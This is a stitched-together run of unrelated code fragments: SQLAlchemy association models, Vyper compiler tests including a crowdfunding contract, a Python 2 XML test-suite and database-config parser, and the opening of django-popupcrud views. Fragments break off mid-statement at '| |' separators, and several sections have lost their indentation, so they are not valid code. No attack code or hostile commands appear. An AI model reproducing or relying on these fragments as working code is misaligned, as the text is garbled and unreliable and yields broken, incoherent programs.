    id = db.Column(db.Integer, primary_key=True)
    ancestor_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
    descendant_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    descendant = db.relationship(
        "Domain",
        foreign_keys=[descendant_id],
        back_populates="aggregateds",
        lazy="joined",
    )
    ancestor = db.relationship(
        "Domain",
        foreign_keys=[ancestor_id],
        back_populates="aggregators",
        lazy="joined",
    )
    distance = db.Column(db.Integer)

    @property
    def s(self):
        # Full serialization: own columns plus both endpoints' `s` dicts.
        d = self.to_dict()
        d["ancestor"] = self.ancestor.s
        d["descendant"] = self.descendant.s
        return d

    @property
    def ss(self):
        # Short serialization: endpoints only, no own columns.
        d = {}
        d["ancestor"] = self.ancestor.ss
        d["descendant"] = self.descendant.ss
        return d
class Depend(db.Model):
    """Dependency edge between two domains, mirroring Aggregate's shape.

    NOTE(review): unlike Aggregate, `ss` here is a plain method (it takes a
    `distance` flag), not a property — callers must invoke it with ().
    """
    id = db.Column(db.Integer, primary_key=True)
    ancestor_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
    descendant_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    descendant = db.relationship(
        "Domain",
        foreign_keys=[descendant_id],
        back_populates="dependants",
        lazy="joined",
    )
    ancestor = db.relationship(
        "Domain", foreign_keys=[ancestor_id], back_populates="dependeds", lazy="joined"
    )
    distance = db.Column(db.Integer)

    @property
    def s(self):
        # Full serialization: own columns plus both endpoints' `s` dicts.
        d = self.to_dict()
        d["ancestor"] = self.ancestor.s
        d["descendant"] = self.descendant.s
        return d

    def ss(self, distance=False):
        # Short serialization; optionally include the hop distance.
        d = {}
        d["ancestor"] = self.ancestor.ss
        d["descendant"] = self.descendant.ss
        if distance:
            d["distance"] = self.distance
        return d
class Follow(db.Model):
    """Association object: one user following another (composite PK)."""
    follower_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
    followed_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
    timestamp = db.Column(db.DateTime, default=datetime.utcnow)
    follower = db.relationship(
        "User", foreign_keys=[follower_id], back_populates="followings", lazy="joined"
    )
    followed = db.relationship(
        "User", foreign_keys=[followed_id], back_populates="followers", lazy="joined"
    )
# class Vote(db.Model):
# voter_id = db.Column(db.Integer,
# db.ForeignKey('user.id'),
# primary_key=True)
# voted_id = db.Column(db.Integer,
# db.ForeignKey('comment.id'),
# primary_key=True)
# timestamp = db.Column(db.DateTime, default=datetime.utcnow)
# voter = db.relationship('User', back_populates='voteds', lazy='joined')
# voted = db.relationship('Comment', back_populates='voters', lazy='joined')
# class Like(db.Model):
# liker_id = db.Column(db.Integer,
# db.ForeignKey('user.id'),
# primary_key=True)
# liked_id = db.Column(db.Integer,
# db.ForeignKey('sparkle.id'),
# primary_key=True)
# timestamp = db.Column(db.DateTime, default=datetime.utcnow)
# liker = db.relationship('User', back_populates='likeds', lazy='joined')
# liked = db.relationship('Sparkle', back_populates='likers', lazy='joined')
class Collect(db.Model):
collector_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
collected_id | |
num
timelimit: timedelta
def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta):
self.beneficiary = _beneficiary
self.deadline = block.timestamp + _timelimit
self.timelimit = _timelimit
self.goal = _goal
@payable
def participate():
assert block.timestamp < self.deadline
nfi = self.nextFunderIndex
self.funders[nfi] = {sender: msg.sender, value: msg.value}
self.nextFunderIndex = nfi + 1
@constant
def expired() -> bool:
return block.timestamp >= self.deadline
@constant
def timestamp() -> timestamp:
return block.timestamp
@constant
def deadline() -> timestamp:
return self.deadline
@constant
def timelimit() -> timedelta:
return self.timelimit
@constant
def reached() -> bool:
return self.balance >= self.goal
def finalize():
assert block.timestamp >= self.deadline and self.balance >= self.goal
selfdestruct(self.beneficiary)
def refund():
ind = self.refundIndex
for i in range(ind, ind + 30):
if i >= self.nextFunderIndex:
self.refundIndex = self.nextFunderIndex
return
send(self.funders[i].sender, self.funders[i].value)
self.funders[i] = None
self.refundIndex = ind + 30
"""
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=5)
assert c.timelimit() == 600
assert c.deadline() - c.timestamp() == 600
assert not c.expired()
assert not c.reached()
c.participate(value=49)
assert c.reached()
pre_bal = s.head_state.get_balance(t.a1)
s.head_state.timestamp += 1000
assert c.expired()
c.finalize()
post_bal = s.head_state.get_balance(t.a1)
assert post_bal - pre_bal == 54
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=1, sender=t.k3)
c.participate(value=2, sender=t.k4)
c.participate(value=3, sender=t.k5)
c.participate(value=4, sender=t.k6)
s.head_state.timestamp += 1000
assert c.expired()
assert not c.reached()
pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
c.refund()
post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4]
print('Passed second composite crowdfund test')
def test_test_bytes():
    """Round-trip a bytes argument through the contract and check the cap.

    Fix: the original wrapped ``assert False`` in a bare ``except:`` which
    swallowed the AssertionError itself, so the too-long case could never
    fail.  try/except/else makes a missing revert an actual test failure.
    """
    test_bytes = """
def foo(x: bytes <= 100) -> bytes <= 100:
    return x
    """
    c = get_contract(test_bytes)
    moo_result = c.foo(b'cow')
    assert moo_result == b'cow'
    print('Passed basic bytes test')
    assert c.foo(b'\x35' * 100) == b'\x35' * 100
    print('Passed max-length bytes test')
    try:
        c.foo(b'\x35' * 101)
    except Exception:
        pass
    else:
        assert False, 'input longer than 100 bytes must be rejected'
    print('Passed input-too-long test')
def test_test_bytes2():
    """Copying a bytes argument through a local must not corrupt it."""
    src = """
def foo(x: bytes <= 100) -> bytes <= 100:
    y = x
    return y
    """
    c = get_contract(src)
    assert c.foo(b'cow') == b'cow'
    assert c.foo(b'') == b''
    # lengths straddling the 64-byte boundary
    for n in (63, 64, 65):
        payload = b'\x35' * n
        assert c.foo(payload) == payload
    print('Passed string copying test')
def test_test_bytes3():
    """Storage bytes round-trips, with num fields guarding both sides."""
    src = """
x: num
maa: bytes <= 60
y: num
def __init__():
    self.x = 27
    self.y = 37
def set_maa(inp: bytes <= 60):
    self.maa = inp
def set_maa2(inp: bytes <= 60):
    ay = inp
    self.maa = ay
def get_maa() -> bytes <= 60:
    return self.maa
def get_maa2() -> bytes <= 60:
    ay = self.maa
    return ay
def get_xy() -> num:
    return self.x * self.y
    """
    c = get_contract(src)

    def check_both(expected):
        # both getter paths must agree with the last value written
        assert c.get_maa() == expected
        assert c.get_maa2() == expected

    c.set_maa(b"pig")
    check_both(b"pig")
    c.set_maa2(b"")
    check_both(b"")
    c.set_maa(b"\x44" * 60)
    check_both(b"\x44" * 60)
    c.set_maa2(b"mongoose")
    assert c.get_maa() == b"mongoose"
    # the surrounding num slots must be untouched by the bytes writes
    assert c.get_xy() == 999
    print('Passed advanced string copying test')
def test_test_bytes4():
    """Assigning None to a bytes slot (storage or memory) must clear it."""
    src = """
a: bytes <= 60
def foo(inp: bytes <= 60) -> bytes <= 60:
    self.a = inp
    self.a = None
    return self.a
def bar(inp: bytes <= 60) -> bytes <= 60:
    b = inp
    b = None
    return b
    """
    c = get_contract(src)
    cleared = c.foo()
    assert cleared == b"", cleared
    assert c.bar() == b""
    print('Passed string deleting test')
def test_test_bytes5():
    """Structs with two bytes members: storage, memory, and copies between."""
    src = """
g: {a: bytes <= 50, b: bytes <= 50}
def foo(inp1: bytes <= 40, inp2: bytes <= 45):
    self.g = {a: inp1, b: inp2}
def check1() -> bytes <= 50:
    return self.g.a
def check2() -> bytes <= 50:
    return self.g.b
def bar(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
    h = {a: inp1, b: inp2}
    return h.a
def bat(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
    h = {a: inp1, b: inp2}
    return h.b
def quz(inp1: bytes <= 40, inp2: bytes <= 45):
    h = {a: inp1, b: inp2}
    self.g = h
    """
    c = get_contract(src)
    # write to storage struct, read each member back
    c.foo(b"cow", b"horse")
    assert c.check1() == b"cow"
    assert c.check2() == b"horse"
    # memory struct round-trips
    left, right = b"pig", b"moose"
    assert c.bar(left, right) == left
    assert c.bat(left, right) == right
    # memory -> storage copy
    c.quz(b"badminton", b"fluffysheep")
    assert c.check1() == b"badminton"
    assert c.check2() == b"fluffysheep"
    print('Passed string struct test')
def test_test_slice():
    """slice() result and neighbouring locals must not clobber each other."""
    src = """
def foo(inp1: bytes <= 10) -> bytes <= 3:
    x = 5
    s = slice(inp1, start=3, len=3)
    y = 7
    return s
def bar(inp1: bytes <= 10) -> num:
    x = 5
    s = slice(inp1, start=3, len=3)
    y = 7
    return x * y
    """
    c = get_contract(src)
    sliced = c.foo(b"badminton")
    assert sliced == b"min", sliced
    assert c.bar(b"badminton") == 35
    print('Passed slice test')
def test_test_slice2():
    """Repeatedly re-slicing the same memory variable inside a loop."""
    src = """
def slice_tower_test(inp1: bytes <= 50) -> bytes <= 50:
    inp = inp1
    for i in range(1, 11):
        inp = slice(inp, start=1, len=30 - i * 2)
    return inp
    """
    c = get_contract_with_gas_estimation(src)
    out = c.slice_tower_test(b"abcdefghijklmnopqrstuvwxyz1234")
    assert out == b"klmnopqrst", out
    print('Passed advanced slice test')
def test_test_slice3():
    """slice() into a storage slot, with num slots guarding both sides."""
    src = """
x: num
s: bytes <= 50
y: num
def foo(inp1: bytes <= 50) -> bytes <= 50:
    self.x = 5
    self.s = slice(inp1, start=3, len=3)
    self.y = 7
    return self.s
def bar(inp1: bytes <= 50) -> num:
    self.x = 5
    self.s = slice(inp1, start=3, len=3)
    self.y = 7
    return self.x * self.y
    """
    c = get_contract(src)
    stored = c.foo(b"badminton")
    assert stored == b"min", stored
    assert c.bar(b"badminton") == 35
    print('Passed storage slice test')
def test_test_slice4():
    """slice() with runtime start/len; out-of-range pairs must revert.

    Fix: each failure case wrapped ``assert False`` in a bare ``except:``,
    which swallowed the AssertionError itself — a missing revert could never
    fail the test.  The loop below uses try/except/else instead.
    """
    test_slice4 = """
def foo(inp: bytes <= 10, start: num, len: num) -> bytes <= 10:
    return slice(inp, start=start, len=len)
    """
    c = get_contract(test_slice4)
    assert c.foo(b"badminton", 3, 3) == b"min"
    assert c.foo(b"badminton", 0, 9) == b"badminton"
    assert c.foo(b"badminton", 1, 8) == b"adminton"
    assert c.foo(b"badminton", 1, 7) == b"adminto"
    assert c.foo(b"badminton", 1, 0) == b""
    assert c.foo(b"badminton", 9, 0) == b""
    # every (start, len) pair that reaches past the end must fail
    for start, length in ((0, 10), (1, 9), (9, 1), (10, 0)):
        try:
            c.foo(b"badminton", start, length)
        except Exception:
            pass
        else:
            assert False, 'slice(start=%d, len=%d) should have failed' % (start, length)
    print('Passed slice edge case test')
def test_test_length():
    """len() of the argument, a memory slice and a storage slice at once."""
    src = """
y: bytes <= 10
def foo(inp: bytes <= 10) -> num:
    x = slice(inp, start=1, len=5)
    self.y = slice(inp, start=2, len=4)
    return len(inp) * 100 + len(x) * 10 + len(self.y)
    """
    c = get_contract(src)
    got = c.foo(b"badminton")
    # 9 (input) * 100 + 5 (memory slice) * 10 + 4 (storage slice)
    assert got == 954, got
    print('Passed length test')
def test_test_concat():
    """concat() of two and three bytes arguments, including empties."""
    src = """
def foo2(input1: bytes <= 50, input2: bytes <= 50) -> bytes <= 1000:
    return concat(input1, input2)
def foo3(input1: bytes <= 50, input2: bytes <= 50, input3: bytes <= 50) -> bytes <= 1000:
    return concat(input1, input2, input3)
    """
    c = get_contract(src)
    # two-arg concat, including empty operands on either side
    for left, right in ((b"h", b"orse"), (b"h", b""), (b"", b""), (b"", b"orse")):
        assert c.foo2(left, right) == left + right
    assert c.foo3(b"Buffalo", b" ", b"buffalo") == b"Buffalo buffalo"
    # operands around the 32-byte word boundary
    assert c.foo2(b"\x36", b"\x35" * 32) == b"\x36" + b"\x35" * 32
    assert c.foo2(b"\x36" * 48, b"\x35" * 32) == b"\x36" * 48 + b"\x35" * 32
    assert c.foo3(b"horses" * 4, b"mice" * 7, b"crows" * 10) == b"horses" * 4 + b"mice" * 7 + b"crows" * 10
    print('Passed simple concat test')
def test_test_concat2():
    """concat() with ten operands referring to the same memory value."""
    src = """
def foo(inp: bytes <= 50) -> bytes <= 1000:
    x = inp
    return concat(x, inp, x, inp, x, inp, x, inp, x, inp)
    """
    c = get_contract(src)
    base = b"horse" * 9 + b"viper"
    assert c.foo(base) == base * 10
    print('Passed second concat test')
def test_crazy_concat_code():
    """concat() mixing a memory value, a storage value and string literals."""
    src = """
y: bytes <= 10
def krazykonkat(z: bytes <= 10) -> bytes <= 25:
    x = "cow"
    self.y = "horse"
    return concat(x, " ", self.y, " ", z)
    """
    c = get_contract(src)
    result = c.krazykonkat(b"moose")
    assert result == b'cow horse moose'
    print('Passed third concat test')
def test_string_literal_code():
    """String literals returned and concatenated around word boundaries."""
    src = """
def foo() -> bytes <= 5:
    return "horse"
def bar() -> bytes <= 10:
    return concat("b", "a", "d", "m", "i", "", "nton")
def baz() -> bytes <= 40:
    return concat("0123456789012345678901234567890", "12")
def baz2() -> bytes <= 40:
    return concat("01234567890123456789012345678901", "12")
def baz3() -> bytes <= 40:
    return concat("0123456789012345678901234567890", "1")
def baz4() -> bytes <= 100:
    return concat("01234567890123456789012345678901234567890123456789",
                  "01234567890123456789012345678901234567890123456789")
    """
    c = get_contract(src)
    expectations = [
        ('foo', b"horse"),
        ('bar', b"badminton"),
        ('baz', b"012345678901234567890123456789012"),
        ('baz2', b"0123456789012345678901234567890112"),
        ('baz3', b"01234567890123456789012345678901"),
        ('baz4', b"0123456789" * 10),
    ]
    for method, expected in expectations:
        assert getattr(c, method)() == expected
    print("Passed string literal test")
def test_kode():
for i in range(95, 96, 97):
kode = """
moo: bytes <= 100
def foo(s: num, L: num) -> bytes <= 100:
x = 27
r = slice("%s", start=s, | |
suite_soup):
"""
Returns a dict with information about 1 Suite from Test-Suites XML.
The "suite" must be a XML Soup class.
"""
logFull('xmlparser:getSuiteInfo')
# A suite can be a part of only 1 EP !
res = OrderedDict()
# The first parameter is the Suite name
if suite_soup.getparent().xpath('id'):
res['suite'] = suite_soup.getparent().xpath('id')[0].text
else:
res['suite'] = ''
# Add properties from PROJECT
prop_keys = self.configTS.xpath('/Root/UserDefined/propName')
prop_vals = self.configTS.xpath('/Root/UserDefined/propValue')
res.update(dict(zip([k.text for k in prop_keys], [v.text for v in prop_vals])))
# Add property/ value tags from Suite
prop_keys = suite_soup.xpath('UserDefined/propName')
prop_vals = suite_soup.xpath('UserDefined/propValue')
res.update(dict(zip([k.text for k in prop_keys], [v.text for v in prop_vals])))
res['type'] = 'suite'
# Get Suite ID from testsuites.xml
res['id'] = suite_soup.xpath('ID')[0].text
# The first parameter is the EP name
res['ep'] = suite_soup.xpath('EpId')[0].text
# Parse all known Suites Tags
for tag_dict in SUITES_TAGS:
# Create default entry
res[tag_dict['name']] = tag_dict['default']
# Update value from XML
if suite_soup.xpath(tag_dict['tag'] + '/text()'):
value = suite_soup.xpath(tag_dict['tag'])[0].text
if not value.strip():
continue
res[tag_dict['name']] = value
return res
def getFileInfo(self, file_soup):
    """
    Returns an OrderedDict with information about 1 File from Test-Suites XML.
    The "file" must be an lxml element.

    Improvements over the original: the property key/value pairs are walked
    with zip() instead of range(len(...)) (and no longer crash on a
    keys/values length mismatch — zip truncates to the shorter list), and a
    missing "enabled" attribute on a config file no longer raises.
    """
    logFull('xmlparser:getFileInfo')
    res = OrderedDict()
    res['type'] = 'file'
    # Get File ID from testsuites.xml
    res['id'] = file_soup.xpath('ID')[0].text
    # The parent element holds the Suite name
    res['suite'] = file_soup.getparent().xpath('id')[0].text
    # Parse all known File Tags
    for tag_dict in TESTS_TAGS:
        # Create default entry
        res[tag_dict['name']] = tag_dict['default']
        # Exception for config files: collect all enabled <cfg> entries
        if tag_dict['name'] == '_cfg_files':
            cfg_files = []
            for cfg_soup in file_soup.xpath(tag_dict['tag']):
                # tolerate a missing "enabled" attribute instead of crashing
                if (cfg_soup.get('enabled') or '').lower() == 'true':
                    cfg_files.append({
                        'name': cfg_soup.get('name'),
                        'iter_default': cfg_soup.get('iterator_default'),
                        'iter_sof': cfg_soup.get('iterator_sof'),
                    })
            if cfg_files:
                res[tag_dict['name']] = cfg_files
        # Update value from XML; keep the default for empty/whitespace text
        elif file_soup.xpath(tag_dict['tag'] + '/text()'):
            value = file_soup.xpath(tag_dict['tag'])[0].text
            if not value.strip():
                continue
            res[tag_dict['name']] = value
    # Inject this empty variable
    res['twister_tc_revision'] = '-1'
    # Add property/value tags. The order of the properties is important!
    prop_keys = file_soup.xpath('Property/propName')
    prop_vals = file_soup.xpath('Property/propValue')
    params = ''
    for key_el, val_el in zip(prop_keys, prop_vals):
        p_key = key_el.text
        p_val = val_el.text
        # "param" entries accumulate into one comma-terminated string
        if p_key == 'param':
            params += p_val + ','
            p_val = params
        res[p_key] = p_val
    return res
# # # Database Parser # # #
class DBParser(object):
"""
Requirements: LXML.
This parser will parse DB.xml and Shared_DB.xml.
"""
def __init__(self, user, config_data, shared_data=None, use_shared_db=True):
    """Parse the user's DB.xml and, optionally, the Shared_DB.xml.

    `config_data` / `shared_data` may each be a path to an XML file or the
    XML content itself (str/unicode — this module targets Python 2).
    Populates self.db_config['servers'] with connection tuples
    (server, database, user, password, 'U'|'S').  Raises on an invalid
    private config; a broken shared config is only logged.
    """
    self.user = user
    self.db_config = {}
    self.config_data = config_data
    self.user_xml = None
    self.shared_xml = None
    self.use_shared_db = use_shared_db
    if os.path.isfile(config_data):
        data = localFs.read_user_file(self.user, config_data)
        try:
            self.user_xml = etree.fromstring(data)
            # logDebug('User `{}` loaded priv DB config from file `{}`.'.format(user, config_data))
        except Exception:
            raise Exception('Invalid DB config file `{}`, '\
                'for user `{}`!'.format(config_data, self.user))
    # NOTE(review): `a and b or c` binds as `(a and b) or c` here — an empty
    # string still reaches the unicode isinstance check; confirm intended.
    elif config_data and isinstance(config_data, str) or isinstance(config_data, unicode):
        try:
            self.user_xml = etree.fromstring(config_data)
            # logDebug('User `{}` loaded priv DB config from a string.'.format(user))
        except Exception:
            raise Exception('Cannot parse DB config data, for user `{}`!'.format(self.user))
    else:
        raise Exception('Invalid config data type: `{}`, '\
            'for user `{}`!'.format(type(config_data), self.user))
    if shared_data:
        if os.path.isfile(shared_data):
            data = localFs.read_user_file(self.user, shared_data)
            try:
                self.shared_xml = etree.fromstring(data)
                # logDebug('User `{}` loaded shared DB config from file `{}`.'.format(user, shared_data))
            except Exception:
                raise Exception('Invalid shared DB config file `{}`, '\
                    'for user `{}`!'.format(shared_data, self.user))
        elif shared_data and isinstance(shared_data, str) or isinstance(shared_data, unicode):
            try:
                self.shared_xml = etree.fromstring(shared_data)
                # logDebug('User `{}` loaded shared DB config from a string.'.format(user))
            except Exception:
                # shared config failures are tolerated (warn only)
                logWarning('Cannot parse shared DB config data, for user `{}`!'.format(self.user))
        else:
            raise Exception('Invalid shared config data type: `{}`, '\
                'for user `{}`!'.format(type(shared_data), self.user))
    # The servers list is used to know how to connect to a specific server name
    self.db_config['servers'] = {}
    if self.user_xml.xpath('db_config/server/text()') and self.user_xml.xpath('db_config/database/text()'):
        # User's server and database
        db_server = self.user_xml.xpath('db_config/server')[0].text
        db_name = self.user_xml.xpath('db_config/database')[0].text
        db_user = self.user_xml.xpath('db_config/user')[0].text
        db_passwd = self.user_xml.xpath('db_config/password')[0].text
        self.db_config['default_server'] = (db_server, db_name, db_user, db_passwd, 'U')
        self.db_config['servers']['User'] = self.db_config['default_server']
    else:
        raise Exception('Invalid DB config, no server and DB, for user `{}`!'.format(self.user))
    if shared_data and self.shared_xml is not None:
        # Servers list: a malformed shared config drops shared support (warn only)
        try:
            db_server = self.shared_xml.xpath('db_config/server')[0].text
            db_name = self.shared_xml.xpath('db_config/database')[0].text
            db_user = self.shared_xml.xpath('db_config/user')[0].text
            db_passwd = self.shared_xml.xpath('db_config/password')[0].text
            self.db_config['servers']['Shared'] = (db_server, db_name, db_user, db_passwd, 'S')
        except Exception as err:
            logWarning('Invalid shared DB XML, for user `{}`: {}!'.format(self.user, err))
            self.shared_xml = None
def get_inserts(self, db_cfg_role=True):
    """
    Used by Database Manager.
    Returns an OrderedDict mapping a DB connection tuple
    (server, database, user, password, 'U'|'S') to its insert fields and
    SQL insert statements.

    When `db_cfg_role` is True and shared-DB use is disabled, ONLY the
    private db.xml is consulted (early return); otherwise ONLY the shared
    config is used.
    """
    logFull('dbparser:get_inserts')
    insert_queries = OrderedDict()
    # If user has the roles and Use Shared DB is disabled (user DB enabled)
    if db_cfg_role and not self.use_shared_db:
        # Fields and Inserts from private db.xml
        # NOTE(review): private statements are not .strip()ped, shared ones
        # below are — confirm whether the asymmetry is intentional.
        private_db = {}
        private_db['inserts'] = [q.text for q in self.user_xml.xpath('insert_section/sql_statement')]
        fields = OrderedDict()
        for field in self.user_xml.xpath('insert_section/field'):
            data = {}
            data['id'] = field.get('ID', '')
            data['type'] = field.get('Type', '')
            data['query'] = field.get('SQLQuery', '')
            data['level'] = field.get('Level', '')  # Project / Suite / Testcase
            fields[data['id']] = data
        private_db['fields'] = fields
        private_db['shared_db'] = False
        # Add private db to inserts
        db_pair = self.db_config['default_server']
        insert_queries[db_pair] = private_db
        # Return after user db inserts !
        return insert_queries
    if self.shared_xml is None:
        logWarning('Invalid shared DB XML on get inserts, for user `{}`!'.format(self.user))
        return insert_queries
    # Invalid entry ?
    if not self.shared_xml.xpath('db_config/server/text()') or \
        not self.shared_xml.xpath('db_config/database/text()'):
        logWarning('Invalid shared DB XML on get inserts, for user `{}`!'.format(self.user))
        return insert_queries
    # Important MySQL server info
    db_server = self.shared_xml.xpath('db_config/server')[0].text
    db_name = self.shared_xml.xpath('db_config/database')[0].text
    db_user = self.shared_xml.xpath('db_config/user')[0].text
    db_passwd = self.shared_xml.xpath('db_config/password')[0].text
    db_pair = (db_server, db_name, db_user, db_passwd, 'S')
    # Insert fields
    fields = OrderedDict()
    for field in self.shared_xml.xpath('insert_section/field'):
        data = {}
        data['id'] = field.get('ID', '')
        data['type'] = field.get('Type', '')
        data['query'] = field.get('SQLQuery', '')
        data['level'] = field.get('Level', '')  # Project / Suite / Testcase
        fields[data['id']] = data
    # Insert queries
    inserts = []
    for elem in self.shared_xml.xpath('insert_section/sql_statement'):
        inserts.append(elem.text.strip())
    # Save this info
    insert_queries[db_pair] = {
        'inserts': inserts,
        'fields': fields,
        'shared_db': True
    }
    # Return after shared db inserts !
    return insert_queries
def get_query(self, field_id):
    """Return the SQLQuery attribute of insert field *field_id*.

    Used by the applet.  Returns False (after a warning) when the field
    does not exist in the user's db.xml.
    """
    logFull('dbparser:get_query')
    matches = self.user_xml.xpath('insert_section/field[@ID="%s"]' % field_id)
    if not matches:
        logWarning('User {}: Cannot find field ID `{}`!'.format(self.user, field_id))
        return False
    return matches[0].get('SQLQuery')
def get_reports(self, db_cfg_role=True):
"""
Used by Reporting Server.
Returns a list with all report fields and queries.
"""
logFull('dbparser:get_reports')
report_queries = OrderedDict()
def get_fields(server_data, srv_name):
"""
All report fields.
"""
fields = OrderedDict()
for field in server_data.xpath('reports_section/field'):
data = {}
data['id'] = field.get('ID', '')
data['type'] = field.get('Type', '')
data['label'] = field.get('Label', data['id'])
data['sqlquery'] = field.get('SQLQuery', '')
data['srv_name'] = srv_name
fields[data['id']] = data
return fields
def get_reps(server_data, srv_name):
"""
All reports.
"""
reports = OrderedDict()
for report in server_data.xpath('reports_section/report'):
data = {}
data['id'] = report.get('ID', '')
data['type'] = report.get('Type', '')
data['path'] = report.get('Path', '')
data['folder'] = report.get('Folder', '')
data['sqlquery'] = report.get('SQLQuery', '')
data['sqltotal'] = report.get('SQLTotal', '') # SQL Total Query
data['sqlcompr'] = report.get('SQLCompare', '') # SQL Query Compare side by side
data['srv_name'] = srv_name # Save server name here
reports[data['id']] = data
return reports
def get_redirects(server_data, srv_name):
"""
All redirects.
"""
redirects = OrderedDict()
for redirect in server_data.xpath('reports_section/redirect'):
data = {}
data['id'] = redirect.get('ID', '')
data['path'] = redirect.get('Path', '')
data['srv_name'] = srv_name
redirects[data['id']] = data
return redirects
# If the user has the roles AND Use Shared DB is disabled (user DB enabled)
if db_cfg_role and not self.use_shared_db:
# Insert user DB first and shared DB second
db_pair = self.db_config['default_server']
# Reports and Redirects from private db.xml
report_queries[db_pair] = {
'fields': get_fields(self.user_xml, 'User'),
'reports': get_reps(self.user_xml, 'User'),
'redirects': get_redirects(self.user_xml, 'User')
}
if not self.use_shared_db and not db_cfg_role:
logInfo('Insufficient privileges to get user reports, for user `{}`!'.format(self.user))
# Valid shared db.xml
if self.shared_xml is None:
logWarning('Invalid shared DB XML on get reports, for user `{}`!'.format(self.user))
return report_queries
# Invalid entry ?
if not self.shared_xml.xpath('db_config/server/text()') or \
not self.shared_xml.xpath('db_config/database/text()'):
logWarning('Invalid shared DB XML on get reports, for user `{}`!'.format(self.user))
return report_queries
# Important MySQL server info
db_server = self.shared_xml.xpath('db_config/server')[0].text
db_name = self.shared_xml.xpath('db_config/database')[0].text
db_user = self.shared_xml.xpath('db_config/user')[0].text
db_passwd = self.shared_xml.xpath('db_config/password')[0].text
db_pair = (db_server, db_name, db_user, db_passwd, 'S')
# Overwrite all private fields, reports or redirects
if db_pair in report_queries:
report_queries[db_pair]['fields'].update(get_fields(self.shared_xml, 'Shared'))
report_queries[db_pair]['reports'].update(get_reps(self.shared_xml, 'Shared'))
report_queries[db_pair]['redirects'].update(get_redirects(self.shared_xml, 'Shared'))
# Save this info
else:
report_queries[db_pair] = {
'fields': get_fields(self.shared_xml, 'Shared'),
'reports': get_reps(self.shared_xml, 'Shared'),
'redirects': | |
<reponame>muxuezi/django-popupcrud
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
""" Popupcrud views """
from collections import OrderedDict
import copy
from django import forms
from django.db import transaction
from django.conf import settings
from django.conf.urls import include, url
from django.core.exceptions import (
FieldDoesNotExist, ObjectDoesNotExist)
from django.shortcuts import render_to_response
from django.views import generic
from django.http import JsonResponse
from django.template import loader
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib import messages
from django.utils.decorators import classonlymethod
from django.utils.translation import ugettext_lazy as _, ugettext, override
from django.utils.http import urlencode
from django.utils import six
from django.utils.safestring import mark_safe
from django.utils.functional import cached_property
#from django.contrib.admin import ModelAdmin
from pure_pagination import PaginationMixin
from .widgets import RelatedFieldPopupFormWidget
POPUPCRUD_DEFAULTS = {
'base_template': 'base.html',
'page_title_context_variable': 'page_title',
'paginate_by': 10,
}
"""django-popupcrud global settings are specified as the dict variable
``POPUPCRUD`` in settings.py.
``POPUPCRUD`` currently supports the following settings with their
default values:
- ``base_template``: The prjoject base template from which all popupcrud
templates should be derived.
Defaults to ``base.html``.
- ``page_title_context_variable``: Name of the context variable whose value
will be set as the title for the CRUD list view page. This title is
specified as the value for the class attribute ``ViewSet.page_title`` or
as the return value of ``ViewSet.get_page_title()``.
Defaults to ``page_title``.
- ``paginate_by``: Default number of rows per page for queryset pagination.
This is the same as ListView.paginate_by.
Defaults to 10.
"""
# build effective settings by merging any user settings with defaults
POPUPCRUD = POPUPCRUD_DEFAULTS.copy()
POPUPCRUD.update(getattr(settings, 'POPUPCRUD', {}))
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
ERROR_FLAG = 'e'
IGNORED_PARAMS = (
ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR)
DEFAULT_MODAL_SIZES = {
'create_update': 'normal',
'delete': 'normal',
'detail': 'normal',
}
class AjaxObjectFormMixin(object):
    """
    Mixin facilitates single object create/edit functions to be performed
    through an AJAX request.
    Views that provide the feature of creating/editing model objects
    via AJAX requests should derive from this class.
    So if CRUD for a model wants to allow creation of its objects via a popup,
    its CreateView should include this mixin in its derivation chain. Such a
    view can also support its objects being created from the view for another
    model which has a ForeignKey into it and wants to provide 'inline-creation'
    of related objects from a popup without leaving the context of the model
    object view being created/edited.
    """

    def get_context_data(self, **kwargs):
        """Inject the viewset's formset (if any) into the template context."""
        if 'formset' not in kwargs:
            formset = self._viewset.get_formset()
            if formset:
                kwargs['formset'] = formset
        return super(AjaxObjectFormMixin, self).get_context_data(**kwargs)

    def get_ajax_response(self):
        """JSON payload returned to the popup after a successful save."""
        return JsonResponse({
            'name': str(self.object),  # object representation
            'pk': self.object.pk       # object id
        })

    # following two methods are applicable only to Create/Edit views
    def get_form_class(self):
        # An explicit ViewSet.form_class wins over the auto-generated one.
        if getattr(self._viewset, 'form_class', None):
            return self._viewset.form_class
        return super(AjaxObjectFormMixin, self).get_form_class()

    def get_form(self, form_class=None):
        form = super(AjaxObjectFormMixin, self).get_form(form_class)
        # Only auto-generated forms get popup widgets; a custom form_class is
        # assumed to configure its own widgets.
        if not getattr(self._viewset, 'form_class', None):
            self._init_related_fields(form)
        return form

    def _init_related_fields(self, form):
        """Swap ModelChoiceField widgets for popup-aware ones.

        (A dead ``_ = form.fields[fname]`` statement was removed here.)
        """
        related_popups = getattr(self._viewset, 'related_object_popups', {})
        for fname in related_popups:
            if fname in form.fields:
                if isinstance(form.fields[fname], forms.ModelChoiceField):
                    form.fields[fname].widget = RelatedFieldPopupFormWidget(
                        widget=forms.Select(choices=form.fields[fname].choices),
                        new_url=related_popups[fname])

    @transaction.atomic
